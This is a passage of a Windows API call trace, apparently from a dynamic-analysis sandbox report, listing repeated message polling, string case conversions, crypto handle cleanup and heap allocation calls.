wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0265.339] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0265.339] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0265.339] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0265.339] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0265.339] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0265.339] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0265.339] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.339] CryptDestroyKey (hKey=0xaa58e0) returned 1 [0265.339] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0265.339] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0265.340] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0265.340] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0265.340] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0265.340] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0265.340] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0265.340] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0265.340] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0265.340] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0265.340] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0265.340] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0265.340] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0265.340] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0265.340] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0265.340] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0265.341] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0265.341] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0265.341] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0265.341] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0265.341] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0265.341] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0265.341] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0265.341] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.341] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0265.341] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.341] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0265.341] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.342] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.342] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0265.342] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.342] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0265.342] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.342] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.342] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.342] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.342] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0265.342] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0265.342] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0265.342] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0265.342] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0265.342] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.342] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0265.343] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0265.343] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0265.343] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0265.343] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0265.343] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0265.343] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0265.343] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0265.343] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0265.343] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0265.343] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.343] CryptReleaseContext (hProv=0xad2698, dwFlags=0x0) returned 1 [0265.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0265.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab328 [0265.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0265.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0265.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0265.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0265.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0265.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0265.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0265.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0265.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0265.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0265.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0265.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0265.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0265.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0265.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0265.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0265.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0265.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0265.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0265.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0265.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0265.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0265.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0265.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0265.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0265.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0265.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0265.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0265.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0265.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0265.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0265.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0265.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0265.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0265.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0265.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0265.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0265.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0265.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0265.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0265.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0265.346] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0265.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0265.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0265.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0265.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0265.346] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0265.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0265.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0265.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9cd8 [0265.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0265.346] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0265.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0265.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0265.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0265.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0265.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0265.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0265.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0265.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0265.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0265.347] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0265.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0265.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0265.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0265.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0265.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0265.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0265.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0265.347] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0265.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0265.347] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0265.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0265.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0265.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0265.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0265.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0265.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0265.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0265.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0265.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0265.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0265.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0265.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0265.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0265.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0265.348] FreeLibrary (hLibModule=0x74d40000) returned 1 [0265.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0265.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0265.348] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0265.348] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0265.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0265.348] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0265.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0265.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0265.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0265.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0265.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0265.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0265.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0265.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0265.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0265.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0265.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0265.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0265.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0265.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0265.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0265.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0265.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab328 [0265.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a96d8 [0265.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9cd8 [0265.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0265.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa140 [0265.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0265.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0265.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa200 [0265.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0265.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0265.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0265.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0265.350] CloseHandle (hObject=0x2a0) returned 1 [0265.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0265.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0265.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0265.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0265.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0265.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0265.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0265.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0265.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0265.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0265.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0265.354] HeapFree (in: 